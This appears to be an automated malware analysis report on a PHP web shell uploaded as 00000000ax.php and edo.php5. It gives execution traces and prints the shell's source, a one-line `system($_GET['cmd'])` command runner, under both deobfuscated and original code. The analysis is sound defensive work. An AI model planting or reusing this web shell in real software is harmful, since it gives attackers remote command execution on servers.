PHP Malware Analysis

00000000ax.php, edo.php5

md5: 36d459ba97aa24e53dab7e0d03ffddbc

Attributes

Execution

Input


Deobfuscated PHP code

<?php

system($_GET["cmd"]);

Execution traces

data/traces/36d459ba97aa24e53dab7e0d03ffddbc_trace-1676246904.2347.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:08:50.132524]
1	0	1	0.000169	393528
1	3	0	0.000213	393920	{main}	1		/var/www/html/uploads/00000000ax.php	0	0
2	4	0	0.000247	393920	system	0		/var/www/html/uploads/00000000ax.php	1	1	NULL
2	4	1	0.000271	393952
2	4	R			FALSE
1	3	1	0.000285	393920
			0.000308	314240
TRACE END   [2023-02-12 22:08:50.132698]

data/traces/36d459ba97aa24e53dab7e0d03ffddbc_trace-1676261055.9285.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:04:41.826324]
1	0	1	0.000163	393512
1	3	0	0.000208	393896	{main}	1		/var/www/html/uploads/edo.php5	0	0
2	4	0	0.000243	393896	system	0		/var/www/html/uploads/edo.php5	1	1	NULL
2	4	1	0.000271	393928
2	4	R			FALSE
1	3	1	0.000286	393896
			0.000309	314224
TRACE END   [2023-02-13 02:04:41.826499]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php system($_GET["cmd"]);?>